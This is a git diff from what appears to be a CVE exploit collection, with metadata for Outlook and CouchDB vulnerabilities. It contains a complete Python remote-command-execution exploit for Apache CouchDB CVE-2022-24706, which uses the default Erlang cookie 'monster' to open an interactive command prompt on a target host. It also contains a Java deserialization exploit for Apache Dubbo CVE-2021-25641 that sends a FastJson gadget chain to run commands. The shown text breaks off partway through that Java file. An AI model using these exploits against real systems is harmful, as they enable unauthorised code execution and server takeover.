+id: CVE-2023-23397
+source: https://github.com/Trackflaw/CVE-2023-23397
+info:
+  name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制，攻击者能够强制受害者连接到其服务器，而无需用户进行任何操作（零点击漏洞）。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱，请求就会被触发。
+  severity: critical
+  description: |
+    Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
+  scope-of-influence:
+    outlook-2013, outlook-2016, outlook-2019
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-23397
+    cwe-id:  CWE-294
+    cnvd-id: None
+    kve-id: None
   tags: Microsoft, Outlook, cve2023, 权限提升漏洞
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
index 94a6e360..5b9c6d1f 100644
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/CVE-2022-24706-Exploit.py
@@ -1,136 +1,136 @@
-# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
-# Date: 2022-01-21
-# Exploit Author: Konstantin Burov, @_sadshade
-# Software Link: https://couchdb.apache.org/
-# Version: 3.2.1 and below
-# Tested on: Kali 2021.2
-# Based on 1F98D's Erlang Cookie - Remote Code Execution
-# Shodan: port:4369 "name couchdb at"
-# CVE: CVE-2022-24706
-# References:
-#  https://habr.com/ru/post/661195/
-#  https://www.exploit-db.com/exploits/49418
-#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
-#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
-# 
-#
-#!/usr/local/bin/python3
-
-import socket
-from hashlib import md5
-import struct
-import sys
-import re
-import time
-
-TARGET = ""
-EPMD_PORT = 4369 # Default Erlang distributed port
-COOKIE = "monster" # Default Erlang cookie for CouchDB 
-ERLNAG_PORT = 0
-EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
-
-# Some data:
-NAME_MSG  = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
-CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
-CTRL_DATA  = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
-CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
-
-
-def compile_cmd(CMD):
-    MSG  = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
-    MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
-    MSG += struct.pack(">H", len(CMD))
-    MSG += bytes(CMD, 'ascii')
-    MSG += b'jw\x04user'
-    PAYLOAD = b'\x70' + CTRL_DATA + MSG
-    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
-    return PAYLOAD
-
-print("Remote Command Execution via Erlang Distribution Protocol.\n")
-
-while not TARGET:
-    TARGET = input("Enter target host:\n> ")
-
-# Connect to EPMD:
-try:
-    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    epm_socket.connect((TARGET, EPMD_PORT))
-except socket.error as msg:
-    print("Couldnt connect to EPMD: %s\n terminating program" % msg)
-    sys.exit(1)
-    
-epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
-if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
-    data = epm_socket.recv(1024)
-    data = data[0:len(data) - 1].decode('ascii')
-    data = data.split("\n")
-    if len(data) == 1:
-        choise = 1
-        print("Found " + data[0])
-    else:
-        print("\nMore than one node found, choose which one to use:")
-        line_number = 0
-        for line in data:
-            line_number += 1
-            print(" %d) %s" %(line_number, line))
-        choise = int(input("\n> "))
-        
-    ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
-else:
-    print("Node list request error, exiting")
-    sys.exit(1)
-epm_socket.close()
-
-# Connect to Erlang port:
-try:
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect((TARGET, ERLNAG_PORT))
-except socket.error as msg:
-    print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
-    sys.exit(1)
-   
-s.send(NAME_MSG)
-s.recv(5)                    # Receive "ok" message
-challenge = s.recv(1024)     # Receive "challenge" message
-challenge = struct.unpack(">I", challenge[9:13])[0]
-
-#print("Extracted challenge: {}".format(challenge))
-
-# Add Challenge Digest
-CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
-    + bytes(str(challenge), "ascii")).digest()
-s.send(CHALLENGE_REPLY)
-CHALLENGE_RESPONSE = s.recv(1024)
-
-if len(CHALLENGE_RESPONSE) == 0:
-    print("Authentication failed, exiting")
-    sys.exit(1)
-
-print("Authentication successful")
-print("Enter command:\n")
-
-data_size = 0
-while True:
-    if data_size <= 0:
-        CMD = input("> ")
-        if not CMD:
-            continue
-        elif CMD == "exit":
-            sys.exit(0)
-        s.send(compile_cmd(CMD))
-        data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
-        s.recv(45)              # Control message
-        data_size -= 45         # Data size without control message
-        time.sleep(0.1)
-    elif data_size < 1024:        
-        data = s.recv(data_size)
-        #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
-        time.sleep(0.1)
-        print(data.decode())
-        data_size = 0
-    else:        
-        data = s.recv(1024)
-        #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
-        time.sleep(0.1)
-        print(data.decode(),end = '')
+# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
+# Date: 2022-01-21
+# Exploit Author: Konstantin Burov, @_sadshade
+# Software Link: https://couchdb.apache.org/
+# Version: 3.2.1 and below
+# Tested on: Kali 2021.2
+# Based on 1F98D's Erlang Cookie - Remote Code Execution
+# Shodan: port:4369 "name couchdb at"
+# CVE: CVE-2022-24706
+# References:
+#  https://habr.com/ru/post/661195/
+#  https://www.exploit-db.com/exploits/49418
+#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
+# 
+#
+#!/usr/local/bin/python3
+
+import socket
+from hashlib import md5
+import struct
+import sys
+import re
+import time
+
+TARGET = ""
+EPMD_PORT = 4369 # Default Erlang distributed port
+COOKIE = "monster" # Default Erlang cookie for CouchDB 
+ERLNAG_PORT = 0
+EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
+
+# Some data:
+NAME_MSG  = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
+CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
+CTRL_DATA  = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
+CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
+
+
+def compile_cmd(CMD):
+    MSG  = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
+    MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
+    MSG += struct.pack(">H", len(CMD))
+    MSG += bytes(CMD, 'ascii')
+    MSG += b'jw\x04user'
+    PAYLOAD = b'\x70' + CTRL_DATA + MSG
+    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
+    return PAYLOAD
+
+print("Remote Command Execution via Erlang Distribution Protocol.\n")
+
+while not TARGET:
+    TARGET = input("Enter target host:\n> ")
+
+# Connect to EPMD:
+try:
+    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    epm_socket.connect((TARGET, EPMD_PORT))
+except socket.error as msg:
+    print("Couldnt connect to EPMD: %s\n terminating program" % msg)
+    sys.exit(1)
+    
+epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
+if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
+    data = epm_socket.recv(1024)
+    data = data[0:len(data) - 1].decode('ascii')
+    data = data.split("\n")
+    if len(data) == 1:
+        choise = 1
+        print("Found " + data[0])
+    else:
+        print("\nMore than one node found, choose which one to use:")
+        line_number = 0
+        for line in data:
+            line_number += 1
+            print(" %d) %s" %(line_number, line))
+        choise = int(input("\n> "))
+        
+    ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
+else:
+    print("Node list request error, exiting")
+    sys.exit(1)
+epm_socket.close()
+
+# Connect to Erlang port:
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((TARGET, ERLNAG_PORT))
+except socket.error as msg:
+    print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
+    sys.exit(1)
+   
+s.send(NAME_MSG)
+s.recv(5)                    # Receive "ok" message
+challenge = s.recv(1024)     # Receive "challenge" message
+challenge = struct.unpack(">I", challenge[9:13])[0]
+
+#print("Extracted challenge: {}".format(challenge))
+
+# Add Challenge Digest
+CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+    + bytes(str(challenge), "ascii")).digest()
+s.send(CHALLENGE_REPLY)
+CHALLENGE_RESPONSE = s.recv(1024)
+
+if len(CHALLENGE_RESPONSE) == 0:
+    print("Authentication failed, exiting")
+    sys.exit(1)
+
+print("Authentication successful")
+print("Enter command:\n")
+
+data_size = 0
+while True:
+    if data_size <= 0:
+        CMD = input("> ")
+        if not CMD:
+            continue
+        elif CMD == "exit":
+            sys.exit(0)
+        s.send(compile_cmd(CMD))
+        data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
+        s.recv(45)              # Control message
+        data_size -= 45         # Data size without control message
+        time.sleep(0.1)
+    elif data_size < 1024:        
+        data = s.recv(data_size)
+        #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
+        time.sleep(0.1)
+        print(data.decode())
+        data_size = 0
+    else:        
+        data = s.recv(1024)
+        #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
+        time.sleep(0.1)
+        print(data.decode(),end = '')
         data_size -= 1024
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
index b0018858..73708b8f 100644
--- a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
+++ b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md
@@ -1,26 +1,26 @@
-# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706
-Date: 2022-01-21
-
-Exploit Author: Konstantin Burov, @_sadshade
-
-Software Link: https://couchdb.apache.org/
-
-Version: 3.2.1 and below
-
-Tested on: Kali 2021.2
-
-Based on 1F98D's Erlang Cookie - Remote Code Execution
-
-Shodan: port:4369 "name couchdb at"
-
-CVE: CVE-2022-24706
-
-References:
-
-https://habr.com/ru/post/661195/
-
-https://www.exploit-db.com/exploits/49418
-
-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
-
+# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706
+Date: 2022-01-21
+
+Exploit Author: Konstantin Burov, @_sadshade
+
+Software Link: https://couchdb.apache.org/
+
+Version: 3.2.1 and below
+
+Tested on: Kali 2021.2
+
+Based on 1F98D's Erlang Cookie - Remote Code Execution
+
+Shodan: port:4369 "name couchdb at"
+
+CVE: CVE-2022-24706
+
+References:
+
+https://habr.com/ru/post/661195/
+
+https://www.exploit-db.com/exploits/49418
+
+https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
+
 https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
\ No newline at end of file
diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
index 50fd5093..948e103c 100644
--- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
+++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml
@@ -1,32 +1,32 @@
-id: CVE-2022-24706
-source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
-info:
-  name: Apache CouchDB 是一个面向文档的数据库管理系统。
-  severity: critical
-  description:
-    当CouchDB 以集群模式安装时，会开启epmd服务，并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster，若未经修改，则攻击者可利用该cookie连接epmd，在知道fqdn的情况下执行任意代码，控制服务器。
-  scope-of-influence:
-    apache-CouchDB < 3.2.2
-  reference:
-    - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
-    - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
-    - http://www.openwall.com/lists/oss-security/2022/04/26/1
-    - http://www.openwall.com/lists/oss-security/2022/05/09/1
-    - http://www.openwall.com/lists/oss-security/2022/05/09/2
-    - http://www.openwall.com/lists/oss-security/2022/05/09/3
-    - http://www.openwall.com/lists/oss-security/2022/05/09/4
-    - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
-    - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
-    - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
-    - https://www.openwall.com/lists/oss-security/2022/04/26/1
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2022-24706
-    cwe-id: CWE-1188
-    cnvd-id: None
-    kve-id: None
-  tags: 
-    - 不安全的默认资源初始化
-    - 弱口令要求
+id: CVE-2022-24706
+source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+info:
+  name: Apache CouchDB 是一个面向文档的数据库管理系统。
+  severity: critical
+  description:
+    当CouchDB 以集群模式安装时，会开启epmd服务，并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster，若未经修改，则攻击者可利用该cookie连接epmd，在知道fqdn的情况下执行任意代码，控制服务器。
+  scope-of-influence:
+    apache-CouchDB < 3.2.2
+  reference:
+    - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
+    - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
+    - http://www.openwall.com/lists/oss-security/2022/04/26/1
+    - http://www.openwall.com/lists/oss-security/2022/05/09/1
+    - http://www.openwall.com/lists/oss-security/2022/05/09/2
+    - http://www.openwall.com/lists/oss-security/2022/05/09/3
+    - http://www.openwall.com/lists/oss-security/2022/05/09/4
+    - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
+    - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
+    - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
+    - https://www.openwall.com/lists/oss-security/2022/04/26/1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-24706
+    cwe-id: CWE-1188
+    cnvd-id: None
+    kve-id: None
+  tags: 
+    - 不安全的默认资源初始化
+    - 弱口令要求
     - 远程代码执行
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
index 684c223a..ed82fde2 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
+++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
@@ -1,60 +1,60 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0"
-         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-
-    <groupId>groupId</groupId>
-    <artifactId>DubboProtocolExploit</artifactId>
-    <version>1.0-SNAPSHOT</version>
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <version>3.8.1</version>
-                <configuration>
-                    <source>8</source>
-                    <target>8</target>
-                </configuration>
-            </plugin>
-        </plugins>
-    </build>
-    <dependencies>
-        <dependency>
-            <groupId>org.apache.dubbo</groupId>
-            <artifactId>dubbo</artifactId>
-            <version>2.7.3</version>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.dubbo</groupId>
-            <artifactId>dubbo-common</artifactId>
-            <version>2.7.3</version>
-        </dependency>
-        <dependency>
-            <groupId>com.alibaba</groupId>
-            <artifactId>dubbo</artifactId>
-            <version>2.6.9</version>
-        </dependency>
-        <dependency>
-            <groupId>com.alibaba</groupId>
-            <artifactId>dubbo-remoting-netty4</artifactId>
-            <version>2.6.9</version>
-        </dependency>
-        <dependency>
-            <groupId>io.netty</groupId>
-            <artifactId>netty-all</artifactId>
-            <version>4.1.60.Final</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework</groupId>
-            <artifactId>spring-web</artifactId>
-            <version>5.1.9.RELEASE</version>
-        </dependency>
-        <dependency>
-            <groupId>com.nqzero</groupId>
-            <artifactId>permit-reflect</artifactId>
-            <version>0.4</version>
-        </dependency>
-    </dependencies>
-</project>
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>groupId</groupId>
+    <artifactId>DubboProtocolExploit</artifactId>
+    <version>1.0-SNAPSHOT</version>
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.8.1</version>
+                <configuration>
+                    <source>8</source>
+                    <target>8</target>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.dubbo</groupId>
+            <artifactId>dubbo</artifactId>
+            <version>2.7.3</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.dubbo</groupId>
+            <artifactId>dubbo-common</artifactId>
+            <version>2.7.3</version>
+        </dependency>
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>dubbo</artifactId>
+            <version>2.6.9</version>
+        </dependency>
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>dubbo-remoting-netty4</artifactId>
+            <version>2.6.9</version>
+        </dependency>
+        <dependency>
+            <groupId>io.netty</groupId>
+            <artifactId>netty-all</artifactId>
+            <version>4.1.60.Final</version>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-web</artifactId>
+            <version>5.1.9.RELEASE</version>
+        </dependency>
+        <dependency>
+            <groupId>com.nqzero</groupId>
+            <artifactId>permit-reflect</artifactId>
+            <version>0.4</version>
+        </dependency>
+    </dependencies>
+</project>
diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java
index 0efbaf72..b165e7b8 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java
@@ -1,157 +1,157 @@
-package DubboProtocolExploit;
-
-
-import com.alibaba.fastjson.JSONObject;
-import org.apache.dubbo.common.io.Bytes;
-import org.apache.dubbo.common.serialize.Serialization;
-import org.apache.dubbo.common.serialize.fst.FstObjectOutput;
-import org.apache.dubbo.common.serialize.fst.FstSerialization;
-import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput;
-import org.apache.dubbo.common.serialize.kryo.KryoSerialization;
-import org.apache.dubbo.common.serialize.ObjectOutput;
-import org.apache.dubbo.rpc.RpcInvocation;
-import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput;
-import org.apache.dubbo.serialize.hessian.Hessian2Serialization;
-/*import com.alibaba.dubbo.common.io.Bytes;
-import com.alibaba.dubbo.common.serialize.Serialization;
-import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput;
-import com.alibaba.dubbo.common.serialize.fst.FstSerialization;
-import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput;
-import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization;
-import com.alibaba.dubbo.common.serialize.ObjectOutput;*/
-
-import java.io.ByteArrayOutputStream;
-import java.io.IOException;
-import java.io.OutputStream;
-import java.io.Serializable;
-import java.lang.reflect.Method;
-import java.net.Socket;
-
-/*  This Dubbo protocol exploit affects versions <= 2.7.3,
-    and will print "whoops!" on the server's console via RCE.
-
-    This issue is caused by deserialization of untrusted data,
-    triggered via a communication protocol that allows dynamically
-    switching to a vulnerable deserializer, and exploited with a
-    payload gadget chain based on FastJson
-
-    On Windows servers - it will try to execute calc.exe
-    On Linux servers - it will touch /tmp/dubboexploited
- */
-
-public class Main {
-    // Customize URL for remote targets
-    public static String DUBBO_HOST_NAME = "localhost";
-    public static int    DUBBO_HOST_PORT = 20880;
-
-    // OS-specific payloads - comment to switch OS variants
-    // exploit will print "whoops!" on server console either way
-    //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux
-    public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows
-
-    //Exploit variant - comment to switch exploit variants
-    public static String EXPLOIT_VARIANT = "Kryo";
-    //public static String EXPLOIT_VARIANT = "FST";
-
-    // Magic header from ExchangeCodec
-    protected static final short MAGIC = (short) 0xdabb;
-    protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0];
-    protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1];
-
-    // Message flags from ExchangeCodec
-    protected static final byte FLAG_REQUEST = (byte) 0x80;
-    protected static final byte FLAG_TWOWAY = (byte) 0x40;
-
-    public static void main(String[] args) throws Exception {
-        Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND);  // TemplatesImpl gadget chain
-
-        // triggers Runtime.exec() on TemplatesImpl.newTransformer()
-        JSONObject jo = new JSONObject();
-        jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper
-        Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger
-
-        // encode request data.
-        ByteArrayOutputStream bos = new ByteArrayOutputStream();
-
-        // Kryo exploit variant
-        Serialization s;
-        ObjectOutput objectOutput;
-        switch(EXPLOIT_VARIANT) {
-             case "FST":
-                s = new FstSerialization();
-                objectOutput = new FstObjectOutput(bos);
-                break;
-            case "Kryo":
-            default:
-                s = new KryoSerialization();
-                objectOutput = new KryoObjectOutput(bos);
-                break;
-        }
-
-        // 0xc2 is Hessian2 + two-way + Request serialization
-        // Kryo | two-way | Request is 0xc8 on third byte
-        // FST | two-way | Request is 0xc9 on third byte
-
-        byte requestFlags =  (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY);
-        byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags,
-                0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs
-        bos.write(header);
-        // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too
-        /*
-        objectOutput.writeUTF("notAversion");
-        objectOutput.writeUTF("notAservice");
-        objectOutput.writeUTF("notAserviceVersion");
-        objectOutput.writeUTF("notAmethod");
-        objectOutput.writeUTF("notAtype"); //*/
-
-	// This section contains valid data writes
-        RpcInvocation ri = new RpcInvocation();
-        ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class});
-        //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;");
-        ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}});
-        // Strings need only satisfy "readUTF" calls until "readObject" is reached
-
-        // /*
-        objectOutput.writeUTF("2.0.2");
-        objectOutput.writeUTF("org.apache.dubbo.demo.DemoService");
-        objectOutput.writeUTF("0.0.0");
-        objectOutput.writeUTF("sayHello");
-        objectOutput.writeUTF("Ljava/lang/String;"); //*/
-
-        objectOutput.writeObject(gadgetChain);
-        objectOutput.writeObject(ri.getAttachments());
-
-        objectOutput.flushBuffer();
-        byte[] payload = bos.toByteArray();
-        int len = payload.length - header.length;
-        Bytes.int2bytes(len, payload, 12);
-
-        // Dubbo Message Stream Hex Dump
-        for (int i = 0; i < payload.length; i++) {
-            System.out.print(String.format("%02X", payload[i]) + " ");
-            if ((i + 1) % 8 == 0)
-                System.out.print(" ");
-            if ((i + 1) % 16 == 0 )
-                System.out.println();
-
-        }
-        // Payload string
-        System.out.println();
-        System.out.println(new String(payload));
-
-        Socket pingSocket = null;
-        OutputStream out = null;
-        // Send request over TCP socket
-        try {
-            pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT);
-            out = pingSocket.getOutputStream();
-        } catch (IOException e) {
-            return;
-        }
-        out.write(payload);
-        out.flush();
-        out.close();
-        pingSocket.close();
-        System.out.println("Sent!");
-    }
-}
+package DubboProtocolExploit;
+
+
+import com.alibaba.fastjson.JSONObject;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.Serialization;
+import org.apache.dubbo.common.serialize.fst.FstObjectOutput;
+import org.apache.dubbo.common.serialize.fst.FstSerialization;
+import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput;
+import org.apache.dubbo.common.serialize.kryo.KryoSerialization;
+import org.apache.dubbo.common.serialize.ObjectOutput;
+import org.apache.dubbo.rpc.RpcInvocation;
+import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput;
+import org.apache.dubbo.serialize.hessian.Hessian2Serialization;
+/*import com.alibaba.dubbo.common.io.Bytes;
+import com.alibaba.dubbo.common.serialize.Serialization;
+import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput;
+import com.alibaba.dubbo.common.serialize.fst.FstSerialization;
+import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput;
+import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization;
+import com.alibaba.dubbo.common.serialize.ObjectOutput;*/
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.OutputStream;
+import java.io.Serializable;
+import java.lang.reflect.Method;
+import java.net.Socket;
+
+/*  This Dubbo protocol exploit affects versions <= 2.7.3,
+    and will print "whoops!" on the server's console via RCE.
+
+    This issue is caused by deserialization of untrusted data,
+    triggered via a communication protocol that allows dynamically
+    switching to a vulnerable deserializer, and exploited with a
+    payload gadget chain based on FastJson
+
+    On Windows servers - it will try to execute calc.exe
+    On Linux servers - it will touch /tmp/dubboexploited
+ */
+
+public class Main {
+    // Customize URL for remote targets
+    public static String DUBBO_HOST_NAME = "localhost";
+    public static int    DUBBO_HOST_PORT = 20880;
+
+    // OS-specific payloads - comment to switch OS variants
+    // exploit will print "whoops!" on server console either way
+    //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux
+    public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows
+
+    //Exploit variant - comment to switch exploit variants
+    public static String EXPLOIT_VARIANT = "Kryo";
+    //public static String EXPLOIT_VARIANT = "FST";
+
+    // Magic header from ExchangeCodec
+    protected static final short MAGIC = (short) 0xdabb;
+    protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0];
+    protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1];
+
+    // Message flags from ExchangeCodec
+    protected static final byte FLAG_REQUEST = (byte) 0x80;
+    protected static final byte FLAG_TWOWAY = (byte) 0x40;
+
+    public static void main(String[] args) throws Exception {
+        Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND);  // TemplatesImpl gadget chain
+
+        // triggers Runtime.exec() on TemplatesImpl.newTransformer()
+        JSONObject jo = new JSONObject();
+        jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper
+        Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger
+
+        // encode request data.
+        ByteArrayOutputStream bos = new ByteArrayOutputStream();
+
+        // Kryo exploit variant
+        Serialization s;
+        ObjectOutput objectOutput;
+        switch(EXPLOIT_VARIANT) {
+             case "FST":
+                s = new FstSerialization();
+                objectOutput = new FstObjectOutput(bos);
+                break;
+            case "Kryo":
+            default:
+                s = new KryoSerialization();
+                objectOutput = new KryoObjectOutput(bos);
+                break;
+        }
+
+        // 0xc2 is Hessian2 + two-way + Request serialization
+        // Kryo | two-way | Request is 0xc8 on third byte
+        // FST | two-way | Request is 0xc9 on third byte
+
+        byte requestFlags =  (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY);
